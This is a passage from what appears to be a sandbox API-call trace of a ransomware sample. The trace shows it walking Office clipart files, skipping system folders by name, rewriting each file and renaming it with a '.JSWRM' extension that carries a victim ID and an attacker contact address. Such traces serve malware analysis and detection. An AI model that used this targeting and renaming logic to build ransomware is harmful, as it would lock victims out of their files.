Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0080.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0080.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0080.877] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1580, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105294.WMF", cAlternateFileName="")) returned 1 [0080.877] lstrcmpiW (lpString1="J0105294.WMF", lpString2=".") returned 1 [0080.877] lstrcmpiW (lpString1="J0105294.WMF", lpString2="..") returned 1 [0080.877] lstrcmpiW (lpString1="J0105294.WMF", lpString2="...") returned 1 [0080.877] lstrcmpiW (lpString1="J0105294.WMF", lpString2="windows") returned -1 [0080.877] lstrcmpiW (lpString1="J0105294.WMF", lpString2="recovery") returned -1 [0080.877] lstrcmpiW (lpString1="J0105294.WMF", lpString2="perflogs") returned -1 [0080.878] lstrcmpiW (lpString1="J0105294.WMF", lpString2="documents and settings") returned 1 [0080.878] lstrcmpiW (lpString1="J0105294.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.878] lstrcmpiW (lpString1="J0105294.WMF", lpString2="system volume information") returned -1 [0080.878] lstrcmpiW (lpString1="J0105294.WMF", lpString2="msocache") returned -1 [0080.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0080.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105294.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105294.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105294.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0080.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0080.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105294.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105294.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105294.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0080.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0080.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0080.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0080.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105294.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.913] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5504) returned 1 [0080.913] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1580) returned 0x205850 [0080.913] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1580, lpOverlapped=0x0) returned 1 [0080.936] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.936] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1580, lpOverlapped=0x0) returned 1 [0080.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.936] CloseHandle (hObject=0x314) returned 1 [0080.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0080.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0080.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0080.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0080.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0080.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0080.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.937] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105294.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105294.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105294.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0080.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0080.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0080.939] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105298.WMF", cAlternateFileName="")) returned 1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2=".") returned 1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="..") returned 1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="...") returned 1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="windows") returned -1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="recovery") returned -1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="perflogs") returned -1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="documents and settings") returned 1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="system volume information") returned -1 [0080.939] lstrcmpiW (lpString1="J0105298.WMF", lpString2="msocache") returned -1 [0080.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0080.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105298.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105298.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105298.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0080.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0080.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105298.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105298.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105298.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0080.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0080.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.941] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6320) returned 1 [0080.941] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18b0) returned 0x205850 [0080.941] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x18b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x18b0, lpOverlapped=0x0) returned 1 [0080.943] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.943] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x18b0, lpOverlapped=0x0) returned 1 [0080.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.943] CloseHandle (hObject=0x314) returned 1 [0080.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0080.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0080.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0080.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0080.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0080.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0080.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.945] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105306.WMF", cAlternateFileName="")) returned 1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2=".") returned 1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="..") returned 1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="...") returned 1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="windows") returned -1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="recovery") returned -1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="perflogs") returned -1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="documents and settings") returned 1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="system volume information") returned -1 [0080.945] lstrcmpiW (lpString1="J0105306.WMF", lpString2="msocache") returned -1 [0080.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0080.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105306.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105306.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105306.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0080.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0080.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105306.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105306.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105306.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0080.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0080.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0080.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.946] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4320) returned 1 [0080.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10e0) returned 0x205850 [0080.946] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x10e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x10e0, lpOverlapped=0x0) returned 1 [0080.948] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.948] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x10e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x10e0, lpOverlapped=0x0) returned 1 [0080.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.948] CloseHandle (hObject=0x314) returned 1 [0080.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0080.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0080.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0080.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0080.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0080.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0080.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.948] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0080.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0080.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0080.949] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105320.WMF", cAlternateFileName="")) returned 1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2=".") returned 1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="..") returned 1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="...") returned 1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="windows") returned -1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="recovery") returned -1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="perflogs") returned -1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="documents and settings") returned 1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="system volume information") returned -1 [0080.949] lstrcmpiW (lpString1="J0105320.WMF", lpString2="msocache") returned -1 [0080.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0080.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105320.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.949] WideCharToMultiByte (in: 